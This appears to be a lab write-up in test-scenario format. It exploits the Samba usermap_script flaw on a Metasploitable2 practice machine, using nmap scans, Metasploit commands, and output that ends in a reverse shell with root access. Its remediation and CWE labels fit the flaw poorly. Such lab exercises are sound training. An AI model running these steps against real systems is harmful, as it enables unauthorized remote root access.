## Version 1.4.1
## language: en

Feature:
  TOE:
    metasploitable2
  Location:
    192.168.1.201:139
  CWE:
    CWE-0928-OWASP-TOP-TEN
  Rule:
    REQ.142 Change system default credentials.
  Goal:
    Get root shell on the remote machine
  Recommendation:
    Change system default credentials.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ParrotSec       | 4.19.0      |
    | Metasploit      | 5.0.4-dev   |
  TOE information:
    Given I am scanning the server 192.168.1.201
    And netbios-ssn is open on port 139
    And SMB version Samba 3.0.20-Debian
    And is running on Ubuntu 2.6.24

  Scenario: Normal use case
  Users can upload or download files from and to the server.
    Given I scan the server
    Then I can see that the port is open
    """
    PORT  STATE  SERVICE
    111/TCP open rpcbind
    139/TCP open netbios-ssn
    445/TCP open microsoft-ds
    """

  Scenario: Static detection
  No code given

  Scenario: Dynamic detection
  Netbios-ssn allows me to exploit and get access to the server
    Given the server is using a vulnerable samba version
    Then I can execute the following command:
    """
    nmap 192.168.1.201
    """
    Then I get the output:
    """
    PORT  STATE  SERVICE
    80/TCP open http
    111/TCP open rpcbind
    139/TCP open netbios-ssn
    445/TCP open microsoft-ds
    512/TCP open exec
    """
    Then I can conclude that samba is open and running.

  Scenario: Exploitation
  In order to get in to the server we need to exploit the vulnerability.
    Given the server samba version is vulnerable
    And the server is using an outdated software.
    Then I can execute the following command:
    """
    msf5 > use exploit/multi/samba/usermap_script
    msf5 > set rhost 192.168.1.201
    msf5 > run
    """
    Then I get the output:
    """
    [*] Started reverse TCP handler on 192.168.1.200:4444
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo FsQvnW5zkwYouXoZ;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "FsQvnW5zkwYouXoZ\r\n"
    [*] Matching...
    [*] A is input...
    [*] Command shell session 1 opened
    id
    uid=0(root) gid=0(root)
    """
    Then I can conclude that I got root access to the server

  Scenario: Remediation
  No code given

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5/10 (high) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.5/10 (high) - CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H